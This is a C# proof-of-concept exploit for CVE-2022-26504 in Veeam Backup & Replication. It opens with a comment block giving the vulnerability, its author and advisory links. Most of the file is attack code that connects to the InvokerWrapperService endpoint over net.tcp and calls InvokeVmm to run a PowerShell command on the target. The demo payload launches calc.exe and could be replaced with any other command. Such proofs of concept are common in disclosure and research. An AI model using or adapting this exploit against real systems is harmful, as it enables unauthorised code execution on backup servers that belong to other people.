/*

# Vulnerability:

CVE-2022-26504 Veeam Backup & Replication Remote Code Execution Vulnerability

# Description:

CVE-2022-26504 is a vulnerability in Veeam Backup & Replication, a component used for Microsoft System Center Virtual Machine Manager (SCVMM) integration that allows domain users to execute malicious code remotely. This may lead to gaining control over the target system.

# Exploit Author:

Sina Kheirkhah (@SinSinology) of @SummoningTeam

# More Details:

https://www.mdsec.co.uk/2022/03/abc-code-execution-for-veeam/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26504
https://www.veeam.com/kb4290

*/

static void Main(string[] args)
{
	string text = "net.tcp://192.168.56.108:8732/InvokerWrapperService";
	Console.WriteLine("Press enter to connect to {0}", text);
	Console.ReadLine();
	ChannelFactory<IPSInvokerService> channelFactory = new ChannelFactory<IPSInvokerService>(new NetTcpBinding());
	string commandName = "powershell.exe";
	string parameterName = "-c ";
	string parameterValue = "calc.exe";
	EndpointAddress address = new EndpointAddress(text);
	IPSInvokerService ipsinvokerService = channelFactory.CreateChannel(address);
	CCredentials credentials = new CCredentials();
	if (ipsinvokerService != null)
	{
		ipsinvokerService.InvokeVmm("servervmm.sinsinology.local", credentials, commandName, parameterName, parameterValue);
	}
	Console.WriteLine("Press enter to exit...");
	Console.ReadLine();
}